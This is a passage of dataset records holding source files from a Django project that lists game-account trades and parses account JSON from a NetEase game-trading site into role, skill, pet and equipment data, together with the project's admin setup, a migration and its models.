]\n"
},
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.7333333492279053,
"avg_line_length": 25,
"blob_id": "369f9a054b6a04bbb2f82d151ba4f053c6c79242",
"content_id": "5f70cb1a0d02e2af05c6d6f856fca64b43d26ef0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 19,
"path": "/backend/admin.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom django.contrib.admin import ModelAdmin\n\nfrom dbmodels import models\n\n\nclass Tran(ModelAdmin):\n list_display = ('__str__','team','img','stat','user')\n list_editable = ('team','img','stat','user',)\n ordering = ['-team',]\nfrom django.db.models.options import Options\n\n\nadmin.site.register(models.ShowImg)\nadmin.site.register(models.Transaction,Tran)\nadmin.site.register(models.RightNav)\nadmin.site.register(models.Menu)\n\n"
},
{
"alpha_fraction": 0.48191991448402405,
"alphanum_fraction": 0.4873300790786743,
"avg_line_length": 32.423492431640625,
"blob_id": "e5acaaddbab055153f2f3968f88b667daf4dd238",
"content_id": "d261a4c23c7eef5f8d9041e424425e1e9da4750e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22298,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 647,
"path": "/spider/parse.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "\nfrom spider import setting\n\nclass Parse:\n def __init__(self, json_data):\n self.json_data = json_data\n self.ResUrl = 'https://cbg-xyq.res.netease.com'\n\n def _get_role_icon(self, icon):\n if icon > 200:\n kindid = ((icon - 200 - 1) % 12 + 1) + 200\n else:\n kindid = ((icon - 1) % 12 + 1)\n return kindid\n\n def _get_role_fly_status(self, i3FlyLv, iZhuanZhi):\n fly_status = \"\"\n if i3FlyLv and i3FlyLv > 0:\n fly_status = \"化圣\" + setting.CHINESE_NUM_CONFIG[i3FlyLv]\n else:\n if iZhuanZhi >= 0:\n fly_status = setting.ROLE_ZHUAN_ZHI_CONFIG[iZhuanZhi]\n return fly_status\n\n def _get_role_changesch(self, changesch_data):\n if changesch_data:\n changesch = ','.join([setting.SchoolNameInfo[i]\n for i in changesch_data])\n else:\n changesch = \"无\"\n return changesch\n\n def _get_role_proKept(self, _prokept, iGrade):\n\n def parse_single_prop_kept(prop, grade):\n # _this = this;\n attr_list = []\n for key in prop:\n if setting.PROP_KEPT_KEYS[key] and prop[key] >= (grade * 2 + 10):\n attr_list.append({\n 'key': key,\n 'value': prop[key],\n 'name': setting.PROP_KEPT_KEYS[key]\n })\n if len(attr_list) < 1:\n return None\n if len(attr_list) < 2:\n return attr_list[0]['name']\n attr_list.sort(key=lambda x: x['value'] or -setting.PROP_KEPT_KEYS_ORDER.index(x['key']))\n\n return attr_list[0]['name'][0:1] + attr_list[1]['name'][0:1]\n\n res = []\n if _prokept:\n for i in range(len(_prokept)):\n s = parse_single_prop_kept(_prokept[str(i)], iGrade)\n s and res.append(s)\n propKept = ','.join(res) if len(res) > 0 else '无'\n return propKept\n\n def _get_role_community_info(self, commu_name, commu_gid):\n if commu_name and commu_gid:\n community_info = str(commu_name) + \":\" + str(commu_gid)\n else:\n community_info = \"无\"\n return community_info\n\n def parse_role(self):\n '''\n 解析角色\n :return:角色字典\n '''\n json_data = self.json_data\n role = {}\n role['iGrade'] = json_data['iGrade']\n role['cName'] = json_data['cName']\n\n # 角色\n kindid = self._get_role_icon(json_data['iIcon'])\n role['roleKindName'] = setting.RoleKindNameInfo[kindid]\n # 人气\n role['iPride'] = json_data['iPride']\n # 帮派\n role['cOrg'] = json_data['cOrg']\n # 帮贡\n role['iOrgOffer'] = json_data['iOrgOffer']\n # 门派\n role['iSchool'] = setting.SchoolNameInfo[json_data['iSchool']]\n # 门贡\n role['iSchOffer'] = json_data['iSchOffer']\n # 气血\n role['iHp_Max'] = json_data['iHp_Max']\n # 体质\n role['iCor_All'] = json_data['iCor_All']\n # 魔法\n role['iMp_Max'] = json_data['iMp_Max']\n # 魔力\n role['iMag_All'] = json_data['iMag_All']\n # 命中\n role['iAtt_All'] = json_data['iAtt_All']\n # 力量\n role['iStr_All'] = json_data['iStr_All']\n # 伤害\n role['iDamage_All'] = json_data['iDamage_All']\n # 耐力\n role['iRes_All'] = json_data['iRes_All']\n # 防御\n role['iDef_All'] = json_data['iDef_All']\n # 敏捷\n role['iSpe_All'] = json_data['iSpe_All']\n # 速度\n role['iDex_All'] = json_data['iDex_All']\n # 潜力\n role['iPoint'] = json_data['iPoint']\n # 法伤\n role['iTotalMagDam_all'] = json_data['iTotalMagDam_all']\n # 法防\n role['iTotalMagDef_all'] = json_data['iTotalMagDef_all']\n # 获得经验\n role['iUpExp'] = json_data['iUpExp']\n # 已用潜能果数量\n role['iNutsNum'] = json_data['iNutsNum']\n # 新版乾元丹数量\n role['TA_iAllNewPoint'] = json_data['TA_iAllNewPoint']\n # 总经验\n role['sum_exp'] = json_data['sum_exp']\n # 月饼粽子食用量\n role['addPoint'] = json_data['addPoint']\n # 原始种族\n role['ori_race'] = json_data['ori_race']\n # 已获得机缘属性\n role['jiyuan'] = json_data['jiyuan']\n # 飞升/渡劫/化圣\n fly_status = self._get_role_fly_status(json_data['i3FlyLv'],\n json_data['iZhuanZhi'])\n role['fly_status'] = fly_status\n # 历史门派\n changesch = self._get_role_changesch(json_data['changesch'])\n role['changesch'] = changesch\n\n # 属性保存方案\n propKept = self._get_role_proKept(json_data['propKept'], json_data['iGrade'])\n role['propKept'] = propKept\n # 攻击修炼\n role['iExptSki1'] = json_data['iExptSki1']\n # 防御修炼\n role['iExptSki2'] = json_data['iExptSki2']\n # 法术修炼\n role['iExptSki3'] = json_data['iExptSki3']\n # 抗法修炼\n role['iExptSki4'] = json_data['iExptSki4']\n # 猎术修炼\n role['iExptSki5'] = json_data['iExptSki5']\n # 育兽术\n role['yu_shou_shu'] = json_data[\"all_skills\"].get(\"221\", 0)\n # 攻击控制力\n role['iBeastSki1'] = json_data['iBeastSki1']\n # 防御控制力\n role['iBeastSki2'] = json_data['iBeastSki2']\n # 法术控制力\n role['iBeastSki3'] = json_data['iBeastSki3']\n # 抗法控制力\n role['iBeastSki4'] = json_data['iBeastSki4']\n # 房屋\n role['fangwu'] = setting.fangwu_info[json_data['rent_level']]\n # 牧场\n role['muchang'] = setting.muchang_info[json_data['farm_level']]\n # 庭院\n role['tingyuan'] = setting.tingyuan_info[json_data['outdoor_level']]\n # 社区\n community_info = self._get_role_community_info(json_data[\"commu_name\"], json_data[\"commu_gid\"])\n role['shequ'] = community_info\n # 比武积分\n role['HeroScore'] = json_data['HeroScore']\n # 剑会积分\n role['sword_score'] = json_data['sword_score']\n # 三界功绩\n role['datang_feat'] = json_data['datang_feat']\n\n return role\n\n def _make_img_name(self, img_name):\n img_id = int(img_name)\n addon = \"\"\n if img_id < 10:\n addon = \"000\"\n elif img_id >= 10 and img_id < 100:\n addon = \"00\"\n elif img_id >= 100 and img_id < 1000:\n addon = \"0\"\n\n return addon + str(img_name)\n\n def _get_skill_icon(self, typeid):\n return self.ResUrl + \"/images/role_skills/\" + self._make_img_name(typeid) + \".gif\"\n\n def parse_skill(self):\n '''\n 解析角色技能\n :return: 角色技能字典\n '''\n json_data = self.json_data\n all_skills = {}\n life_skill = []\n school_skill = []\n ju_qing_skill = []\n\n raw_skill_info = json_data[\"all_skills\"]\n for _skill in raw_skill_info:\n info = {\n \"skill_id\": _skill,\n \"skill_grade\": raw_skill_info[_skill],\n \"skill_pos\": 0\n }\n info[\"skill_icon\"] = self._get_skill_icon(_skill)\n\n if setting.skill[\"life_skill\"].get(_skill):\n info[\"skill_name\"] = setting.skill[\"life_skill\"][_skill]\n life_skill.append(info)\n elif setting.skill[\"school_skill\"].get(_skill):\n info[\"skill_name\"] = setting.skill[\"school_skill\"][_skill][\"name\"]\n info[\"skill_pos\"] = setting.skill[\"school_skill\"][_skill][\"pos\"]\n school_skill.append(info)\n elif setting.skill[\"ju_qing_skill\"].get(_skill):\n info[\"skill_name\"] = setting.skill[\"ju_qing_skill\"][_skill]\n ju_qing_skill.append(info)\n\n all_skills['life_skill'] = life_skill\n all_skills['school_skill'] = school_skill\n all_skills['ju_qing_skill'] = ju_qing_skill\n return all_skills\n\n def _get_equip_info(self, typeid):\n info = setting.equip_info.get(int(typeid))\n result = {\n \"name\": \"\",\n \"desc\": \"\"\n }\n if info:\n result[\"name\"] = info[\"name\"]\n result[\"desc\"] = info[\"desc\"]\n\n return result\n\n def _get_lock_types(self, equip):\n locks = []\n if equip.get(\"iLock\"):\n locks.append(equip[\"iLock\"])\n if equip.get(\"iLockNew\"):\n locks.append(equip[\"iLockNew\"])\n\n return locks\n\n def _parse_equip_info(self, AllEquip):\n result = {}\n\n ResUrl = self.ResUrl\n\n all_equips = AllEquip\n\n get_equip_small_icon = lambda itype: ResUrl + \"/images/equip/small/\" + str(itype) + \".gif\"\n\n get_equip_big_icon = lambda itype: ResUrl + \"/images/big/\" + str(itype) + \".gif\"\n\n using_equips = []\n not_using_equips = []\n for equip in all_equips:\n equip_info = self._get_equip_info(all_equips[equip][\"iType\"])\n info = {\n \"pos\": int(equip),\n \"type\": all_equips[equip][\"iType\"],\n \"name\": equip_info[\"name\"],\n \"desc\": all_equips[equip][\"cDesc\"],\n \"lock_type\": self._get_lock_types(all_equips[equip]),\n \"static_desc\": equip_info[\"desc\"].replace(r'#R', '<br />').replace(r'#r', '<br />'),\n \"small_icon\": get_equip_small_icon(all_equips[equip][\"iType\"]),\n \"big_icon\": get_equip_big_icon(all_equips[equip][\"iType\"])\n }\n\n pos = int(equip)\n if (pos >= 1 and pos <= 6) or (pos in [187, 188, 189, 190]):\n using_equips.append(info)\n else:\n not_using_equips.append(info)\n\n result[\"using_equips\"] = using_equips\n result[\"not_using_equips\"] = not_using_equips\n return result\n\n def _get_fabao_info(self, typeid):\n info = setting.fabao_info.get(int(typeid))\n result = {\n \"name\": \"\",\n \"desc\": \"\"\n }\n if info:\n result[\"name\"] = info[\"name\"]\n result[\"desc\"] = info[\"desc\"]\n\n return result\n\n def _parse_fabao_info(self, fabao):\n result = {}\n ResUrl = self.ResUrl\n all_fabao = fabao\n get_fabao_icon = lambda itype: ResUrl + \"/images/fabao_new2/\" + str(itype) + \".png\"\n\n using_fabao = []\n\n nousing_fabao = []\n for pos in all_fabao:\n fabao_info = self._get_fabao_info(all_fabao[pos][\"iType\"])\n\n info = {\n \"pos\": int(pos),\n \"type\": all_fabao[pos][\"iType\"],\n \"name\": fabao_info[\"name\"],\n \"desc\": all_fabao[pos][\"cDesc\"],\n \"icon\": get_fabao_icon(all_fabao[pos][\"iType\"]),\n \"static_desc\": fabao_info[\"desc\"]\n }\n if info.get('desc'):\n info['desc'] = info['desc'][1:] if info['desc'].startswith('0') else info['desc']\n\n if int(pos) >= 1 and int(pos) <= 4:\n using_fabao.append(info)\n else:\n nousing_fabao.append(info)\n\n nousing_fabao.sort(key=lambda x: x['pos'])\n result[\"using_fabao\"] = using_fabao\n result[\"nousing_fabao\"] = nousing_fabao\n return result\n\n def parse_tool(self):\n '''\n 解析道具/法宝\n :return: 返回道具法宝字典\n '''\n tools = {}\n equip_result = self._parse_equip_info(self.json_data[\"AllEquip\"])\n fabao_result = self._parse_fabao_info(self.json_data[\"fabao\"])\n tools['equip_result'] = equip_result\n tools['fabao_result'] = fabao_result\n return tools\n\n def _safe_attr(self, attr_value, default_value=None):\n if not attr_value:\n return default_value if default_value != None else \"未知\"\n return attr_value\n\n def _parse_pet_info(self, info, pet):\n ResUrl = self.ResUrl\n\n get_pet_icon = lambda itype: ResUrl + \"/images/pets/small/\" + str(itype) + \".gif\"\n\n max_equip_num = 3\n\n get_pet_skill_icon = lambda skill_id: ResUrl + \"/images/pet_child_skill/\" + self._make_img_name(\n skill_id) + \".gif\"\n\n get_pet_equip_icon = lambda typeid: ResUrl + \"/images/equip/small/\" + str(typeid) + \".gif\"\n\n get_pet_shipin_icon = lambda typeid: ResUrl + \"/images/pet_shipin/small/\" + str(typeid) + \".png\"\n\n get_child_icon = lambda child_id: ResUrl + \"/images/child_icon/\" + self._make_img_name(child_id) + \".gif\"\n\n get_child_skill_icon = lambda skill_id: ResUrl + \"/images/pet_child_skill/\" + self._make_img_name(\n skill_id) + \".gif\"\n\n get_pet_name = lambda itype: setting.pet_info.get(itype)\n\n get_child_name = lambda itype: setting.child_info.get(itype)\n\n get_ending_name = lambda itype: setting.ending_info.get(itype)\n\n get_neidan_icon = lambda neidan_id: ResUrl + \"/images/neidan/\" + str(neidan_id) + '.jpg'\n\n info['pet_icon'] = get_pet_icon(pet['iType'])\n\n info[\"genius\"] = pet[\"iGenius\"]\n if info[\"genius\"] != 0:\n info[\"genius_skill\"] = {\n \"icon\": get_pet_skill_icon(pet[\"iGenius\"]),\n \"skill_type\": pet[\"iGenius\"]\n }\n else:\n info[\"genius_skill\"] = {}\n\n info[\"skill_list\"] = []\n all_skills = pet[\"all_skills\"]\n if all_skills:\n all_skill_str = []\n for typeid in all_skills:\n all_skill_str.append(str(typeid))\n if (int(typeid) == info[\"genius\"]):\n continue\n info[\"skill_list\"].append({\n \"icon\": get_pet_skill_icon(typeid),\n \"skill_type\": typeid,\n \"level\": all_skills[typeid]})\n\n info['all_skill'] = '|'.join(all_skill_str)\n else:\n info['all_skill'] = ''\n\n info['all_skills'] = info['all_skill'].split('|')\n\n info[\"equip_list\"] = []\n for i in range(max_equip_num):\n item = pet.get(\"summon_equip\" + str((i + 1)))\n if item:\n equip_name_info = self._get_equip_info(item[\"iType\"])\n info[\"equip_list\"].append({\n \"name\": equip_name_info[\"name\"],\n \"icon\": get_pet_equip_icon(item[\"iType\"]),\n \"type\": item[\"iType\"],\n \"desc\": item[\"cDesc\"],\n \"lock_type\": self._get_lock_types(item),\n \"static_desc\": equip_name_info[\"desc\"].replace(r'#R', '<br />').replace(r'#r', '<br />')\n })\n else:\n info[\"equip_list\"].append(None)\n\n info[\"neidan\"] = []\n if pet[\"summon_core\"]:\n for p in pet[\"summon_core\"]:\n p_core = pet[\"summon_core\"][p]\n info[\"neidan\"].append({\n \"name\": self._safe_attr(setting.PetNeidanInfo[int(p)]),\n \"icon\": get_neidan_icon(p),\n \"level\": p_core[0],\n 'itype': p\n })\n\n def parse_bb(self):\n '''\n 解析宝宝\n :return: 返回宝宝字典\n '''\n allSummon = self.json_data['AllSummon']\n pet_list = []\n\n if not allSummon: return\n for pet in allSummon:\n info = {}\n info[\"iTypeid\"] = pet[\"iType\"]\n # 类型\n info[\"iType\"] = setting.pet_info[pet[\"iType\"]]\n # 气血\n info[\"iHp\"] = pet[\"iHp\"]\n # 魔法\n info[\"iMp\"] = pet[\"iMp\"]\n # 攻击\n info[\"iAtt_all\"] = pet[\"iAtt_all\"]\n # 防御\n info[\"iDef_All\"] = pet[\"iDef_All\"]\n # 速度\n info[\"iDex_All\"] = pet[\"iDex_All\"]\n # 灵力\n info[\"iMagDef_all\"] = pet[\"iMagDef_all\"]\n # 寿命\n info[\"life\"] = pet[\"life\"]\n # 已用元宵\n info[\"yuanxiao\"] = pet[\"yuanxiao\"]\n # 已用炼兽珍经\n info[\"lianshou\"] = pet[\"lianshou\"]\n # 已用清灵仙露\n info[\"left_qlxl\"] = pet[\"left_qlxl\"]\n # 等级\n info[\"iGrade\"] = pet[\"iGrade\"]\n # 体质\n info[\"iCor_all\"] = pet[\"iCor_all\"]\n # 法力\n info[\"iMag_all\"] = pet[\"iMag_all\"]\n # 力量\n info[\"iStr_all\"] = pet[\"iStr_all\"]\n # 耐力\n info[\"iRes_all\"] = pet[\"iRes_all\"]\n # 敏捷\n info[\"iSpe_all\"] = pet[\"iSpe_all\"]\n # 潜能\n info[\"iPoint\"] = pet[\"iPoint\"]\n # 成长\n info[\"grow\"] = pet[\"grow\"] / 1000\n # 已用如意的\n info[\"ruyidan\"] = pet[\"ruyidan\"]\n # 是否宝宝\n info[\"iBaobao\"] = pet[\"iBaobao\"]\n # 攻击资质\n info[\"att\"] = pet[\"att\"]\n # 防御资质\n info[\"def\"] = pet[\"def\"]\n # 体力资质\n info[\"hp\"] = pet[\"hp\"]\n # 法力资质\n info[\"mp\"] = pet[\"mp\"]\n # 速度资质\n info[\"spe\"] = pet[\"spe\"]\n # 躲闪资质\n info[\"dod\"] = pet[\"dod\"]\n # 已用千金露\n info[\"qianjinlu\"] = pet[\"qianjinlu\"]\n # 灵性\n info[\"lx\"] = pet[\"jinjie\"]['lx']\n\n # 技能\n self._parse_pet_info(info, pet)\n\n pet_list.append(info)\n\n return pet_list\n\n def _parse_rider_info(self, raw_info):\n ResUrl = self.ResUrl\n rider_name_info = setting.rider_info\n\n get_rider_icon = lambda itype: ResUrl + \"/images/riders/\" + str(itype) + \".gif\"\n\n get_skill_icon = lambda typeid: ResUrl + \"/images/rider_skill/\" + self._make_img_name(typeid) + \".gif\"\n\n all_rider = raw_info.get(\"AllRider\") or {}\n\n result = []\n for rider in all_rider:\n rider_info = raw_info[\"AllRider\"][rider]\n info = {\n \"type\": rider_info[\"iType\"],\n \"grade\": rider_info[\"iGrade\"],\n \"exgrow\": rider_info[\"exgrow\"] / 10000,\n \"icon\": get_rider_icon(rider_info[\"iType\"]),\n \"type_name\": self._safe_attr(rider_name_info[str(rider_info[\"iType\"])]),\n \"mattrib\": rider_info[\"mattrib\"] if rider_info.get(\"mattrib\") else \"未选择\",\n }\n info[\"all_skills\"] = []\n all_skills = rider_info[\"all_skills\"]\n for typeid in all_skills:\n info[\"all_skills\"].append({\n \"type\": typeid,\n \"icon\": get_skill_icon(typeid),\n \"grade\": all_skills[typeid]\n })\n\n result.append(info)\n\n return result\n\n def parse_rider_info(self):\n '''\n 解析坐骑\n :return: 返回坐骑字典\n '''\n return self._parse_rider_info(self.json_data)\n\n def _parse_xiangrui_info(self, raw_info):\n ResUrl = self.ResUrl\n\n all_xiangrui_info = setting.xiangrui_info\n\n all_skills = setting.xiangrui_skill\n\n nosale_xiangrui = setting.nosale_xiangrui\n\n get_xiangrui_icon = lambda itype: ResUrl + \"/images/xiangrui/\" + str(itype) + \".gif\"\n\n get_skill_icon = lambda: ResUrl + \"/images/xiangrui_skills/1.gif\"\n\n all_xiangrui = raw_info.get(\"HugeHorse\")\n if not all_xiangrui:\n return\n\n result = []\n for pos in all_xiangrui:\n xiangrui_info = all_xiangrui[pos]\n itype = xiangrui_info[\"iType\"]\n info = {\n \"type\": itype,\n \"name\": xiangrui_info['cName'] or self._safe_attr(all_xiangrui_info[itype]),\n \"icon\": get_xiangrui_icon(itype),\n \"skill_name\": all_skills.get(xiangrui_info['iSkill'], '无'),\n \"order\": xiangrui_info[\"order\"]\n }\n if xiangrui_info[\"iSkillLevel\"]:\n info[\"skill_level\"] = str(xiangrui_info[\"iSkillLevel\"]) + \"级\"\n else:\n info[\"skill_level\"] = \"\"\n\n result.append(info)\n\n # result.sort(key=lambda x :x['order'])\n return result\n\n def parse_xiangrui_info(self):\n '''\n 解析祥瑞\n :return:返回祥瑞字典\n '''\n return self._parse_xiangrui_info(self.json_data)\n\n def _parse_clothes_info(self, raw_info):\n ResUrl = self.ResUrl\n all_clothes_info = setting.clothes_info\n get_clothes_icon = lambda itype: ResUrl + \"/images/clothes/\" + str(itype) + \"0000.gif\"\n\n def get_cloth_name_desc(itype):\n if all_clothes_info.get(itype):\n return all_clothes_info[itype]\n else:\n return {\n \"name\": \"\",\n \"desc\": \"\"\n }\n\n all_clothes = raw_info[\"ExAvt\"]\n if not all_clothes:\n return\n\n result = []\n for pos in all_clothes:\n clothes_info = all_clothes[pos]\n clothe_name = clothes_info.get('cName') or self._safe_attr(all_clothes_info[clothes_info[\"iType\"]])\n info = {\n \"type\": clothes_info[\"iType\"],\n \"name\": clothe_name,\n \"icon\": get_clothes_icon(clothes_info[\"iType\"]),\n \"order\": clothes_info[\"order\"],\n \"static_desc\": \"\"\n }\n result.append(info)\n\n return result\n\n def parse_clothes_info(self):\n '''解析锦衣'''\n return self._parse_clothes_info(self.json_data)\n\n def start_parse(self):\n '''开始解析所有字段'''\n result = {}\n result['role_info'] = self.parse_role()\n result['skill_info'] = self.parse_skill()\n result['tool_info'] = self.parse_tool()\n result['pet_info'] = self.parse_bb()\n result['rider_info'] = self.parse_rider_info()\n result['xiangrui_info'] = self.parse_xiangrui_info()\n result['clothes_info'] = self.parse_clothes_info()\n\n return result\n"
},
{
"alpha_fraction": 0.5159574747085571,
"alphanum_fraction": 0.576241135597229,
"avg_line_length": 24.636363983154297,
"blob_id": "831586c8f9212a1ee2fe4fc0ced9589085396ed6",
"content_id": "f332b83665055cae557301f31faf9e7f3fafebaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 22,
"path": "/dbmodels/migrations/0010_auto_20180918_0842.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-18 00:42\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0009_auto_20180918_0835'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='rightnav',\n options={'verbose_name': '右侧导航', 'verbose_name_plural': '右侧导航'},\n ),\n migrations.AddField(\n model_name='rightnav',\n name='icon',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7032864689826965,
"alphanum_fraction": 0.7088193893432617,
"avg_line_length": 45.01226806640625,
"blob_id": "02a416251b3d5994df87a4ff05bc0a06d46970e1",
"content_id": "154d225fb023a21652a111d78beb1b4a0e3c8183",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15751,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 326,
"path": "/dbmodels/models.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n# Create your models here.\n\n\nfrom dbmodels.manager import ShowImgManager, RightNavManager, MenuManager, TransactionManager\n\n\nclass UserInfo(AbstractUser):\n '''用户信息表'''\n REQUIRED_FIELDS = ['nikename','email','sex']\n sex_choices = ((1,'男'),\n (2,'女'),)\n\n nikename = models.CharField(max_length=64,unique=True)\n # pwd = models.CharField(max_length=64)\n # nickname = models.CharField(max_length=16)\n sex = models.IntegerField(choices=sex_choices,null=True,blank=True)\n # email = models.EmailField()\n header_img = models.ImageField(null=True,blank=True)\n\n\n def get_absolute_url(self):\n return '1'\n\nclass Friends(models.Model):\n '''好友表'''\n user = models.OneToOneField('UserInfo',primary_key=True,on_delete=models.CASCADE)\n friend = models.ForeignKey('self',on_delete=models.CASCADE)\n\n\nclass Transaction(models.Model):\n '''交易帖子'''\n objects = TransactionManager()\n stat_choices = ((0, '售出'), (1, '上架'),)\n\n team = models.CharField('队伍',max_length=64)\n img = models.ImageField(upload_to='indeximg',null=True,blank=True)\n create_time = models.DateTimeField(auto_now_add=True)\n stat = models.IntegerField(choices=stat_choices,default=1)\n\n user = models.ForeignKey('UserInfo',on_delete=models.CASCADE)\n\n\n\n class Meta:\n verbose_name_plural = '交易帖子'\n verbose_name = '交易帖子'\n\n def __str__(self):\n return '%s' % (self.team,)\n\n\n\nclass Reply(models.Model):\n '''回复表'''\n count = models.IntegerField()\n user = models.ForeignKey('UserInfo',on_delete=models.CASCADE)\n transaction = models.ForeignKey('Transaction',on_delete=models.CASCADE)\n\nclass Collection(models.Model):\n '''收藏表'''\n count = models.IntegerField()\n user = models.ForeignKey('UserInfo',on_delete=models.CASCADE)\n transaction = models.ForeignKey('Transaction',on_delete=models.CASCADE)\n\nclass Watch(models.Model):\n '''查看表'''\n count = models.IntegerField()\n user = models.ForeignKey('UserInfo',on_delete=models.CASCADE)\n transaction = models.ForeignKey('Transaction',on_delete=models.CASCADE)\n\nclass ShowImg(models.Model):\n objects = ShowImgManager()\n\n stat_choices = ((0,'下架'),(1,'上架'),)\n img_type_choices = ((0,'轮播'),(1,'最热'),(2,'最新'))\n\n img_type = models.IntegerField(choices=img_type_choices,default=3)\n stat = models.IntegerField(choices=stat_choices,default=1)\n top = models.BooleanField(default=False)\n transcation = models.OneToOneField('Transaction',on_delete=models.CASCADE)\n\n class Meta:\n verbose_name_plural = '首页图片'\n verbose_name = '首页图片'\n\n def __str__(self):\n return '%s:%s' % (self.get_img_type_display(),self.transcation.team)\n\nclass RightNav(models.Model):\n objects = RightNavManager()\n stat_choices = ((0, '下架'), (1, '上架'),)\n\n title = models.CharField(max_length=10)\n stat = models.IntegerField(choices=stat_choices, default=1)\n icon = models.CharField(max_length=100,null=True,blank=True)\n\n class Meta:\n verbose_name_plural = '右侧导航'\n verbose_name = '右侧导航'\n\n def __str__(self):\n return '%s:%s' % (self.title,self.get_stat_display())\n\nclass Menu(models.Model):\n objects = MenuManager()\n stat_choices = ((0, '下架'), (1, '上架'),)\n\n title = models.CharField(max_length=10)\n url = models.CharField(max_length=100,null=True,blank=True)\n parent_menu = models.ForeignKey('self',on_delete=models.CASCADE,null=True,blank=True,related_name='child')\n stat = models.IntegerField(choices=stat_choices, default=1)\n\n class Meta:\n verbose_name_plural = '菜单'\n verbose_name = '菜单'\n\n def __str__(self):\n return '%s:%s' % (self.title,self.get_stat_display())\n\n\n\n\n\nclass RoleBase(models.Model):\n eid = models.CharField(max_length=64)\n equip_name = models.CharField(max_length=16)\n\n transaction = models.ForeignKey(to='Transaction',on_delete=models.CASCADE)\n\n class Meta:\n unique_together = ('eid', 'equip_name',)\n\nclass Role(models.Model):\n role_base = models.OneToOneField('RoleBase',on_delete=models.CASCADE)\n\n iGrade = models.IntegerField(verbose_name='等级', null=True, blank=True)\n cName = models.CharField(verbose_name='名称', max_length=10, null=True, blank=True)\n roleKindName = models.CharField(verbose_name='角色', max_length=6, null=True, blank=True)\n iPride = models.IntegerField(verbose_name='人气', null=True, blank=True)\n cOrg = models.CharField(verbose_name='帮派', max_length=10, null=True, blank=True)\n iOrgOffer = models.IntegerField(verbose_name='帮贡', null=True, blank=True)\n iSchool = models.CharField(verbose_name='门派', max_length=4, null=True, blank=True)\n iSchOffer = models.IntegerField(verbose_name='门贡', null=True, blank=True)\n iHp_Max = models.IntegerField(verbose_name='气血', null=True, blank=True)\n iCor_All = models.IntegerField(verbose_name='体质', null=True, blank=True)\n iMp_Max = models.IntegerField(verbose_name='魔法', null=True, blank=True)\n iMag_All = models.IntegerField(verbose_name='魔力', null=True, blank=True)\n iAtt_All = models.IntegerField(verbose_name='命中', null=True, blank=True)\n iStr_All = models.IntegerField(verbose_name='力量', null=True, blank=True)\n iDamage_All = models.IntegerField(verbose_name='伤害', null=True, blank=True)\n iRes_All = models.IntegerField(verbose_name='耐力', null=True, blank=True)\n iDef_All = models.IntegerField(verbose_name='防御', null=True, blank=True)\n iSpe_All = models.IntegerField(verbose_name='敏捷', null=True, blank=True)\n iDex_All = models.IntegerField(verbose_name='速度', null=True, blank=True)\n iPoint = models.IntegerField(verbose_name='潜力', null=True, blank=True)\n iTotalMagDam_all = models.IntegerField(verbose_name='法伤', null=True, blank=True)\n iTotalMagDef_all = models.IntegerField(verbose_name='法防', null=True, blank=True)\n iUpExp = models.IntegerField(verbose_name='获得经验', null=True, blank=True)\n iNutsNum = models.IntegerField(verbose_name='已用潜能果数量', null=True, blank=True)\n TA_iAllNewPoint = models.IntegerField(verbose_name='新版乾元丹数量', null=True, blank=True)\n sum_exp = models.IntegerField(verbose_name='总经验', null=True, blank=True)\n addPoint = models.IntegerField(verbose_name='月饼粽子食用量', null=True, blank=True)\n ori_race = models.IntegerField(verbose_name='原始种族', null=True, blank=True)\n jiyuan = models.IntegerField(verbose_name='已获得机缘属性', null=True, blank=True)\n fly_status = models.CharField(verbose_name='飞升/渡劫/化圣', max_length=6, null=True, blank=True)\n changesch = models.CharField(verbose_name='历史门派', max_length=12, null=True, blank=True)\n propKept = models.CharField(verbose_name='属性保存方案', max_length=10, null=True, blank=True)\n\nclass Practice(models.Model):\n role_base = models.OneToOneField('RoleBase', on_delete=models.CASCADE)\n\n iExptSki1 = models.IntegerField(verbose_name='攻击修炼', null=True, blank=True)\n iExptSki2 = models.IntegerField(verbose_name='防御修炼', null=True, blank=True)\n iExptSki3 = models.IntegerField(verbose_name='法术修炼', null=True, blank=True)\n iExptSki4 = models.IntegerField(verbose_name='抗法修炼', null=True, blank=True)\n iExptSki5 = models.IntegerField(verbose_name='猎术修炼', null=True, blank=True)\n yu_shou_shu = models.IntegerField(verbose_name='育兽术', null=True, blank=True)\n iBeastSki1 = models.IntegerField(verbose_name='攻击控制力', null=True, blank=True)\n iBeastSki2 = models.IntegerField(verbose_name='防御控制力', null=True, blank=True)\n iBeastSki3 = models.IntegerField(verbose_name='法术控制力', null=True, blank=True)\n iBeastSki4 = models.IntegerField(verbose_name='抗法控制力', null=True, blank=True)\n\nclass Home(models.Model):\n role_base = models.OneToOneField('RoleBase', on_delete=models.CASCADE)\n fangwu = models.CharField(verbose_name='房屋', max_length=4, null=True, blank=True)\n muchang = models.CharField(verbose_name='牧场', max_length=2, null=True, blank=True)\n tingyuan = models.CharField(verbose_name='庭院', max_length=4, null=True, blank=True)\n shequ = models.CharField(verbose_name='社区', max_length=2, null=True, blank=True)\n\nclass Score(models.Model):\n role_base = models.OneToOneField('RoleBase', on_delete=models.CASCADE)\n HeroScore = models.IntegerField(verbose_name='比武积分', null=True, blank=True)\n sword_score = models.IntegerField(verbose_name='剑会积分', null=True, blank=True)\n datang_feat = 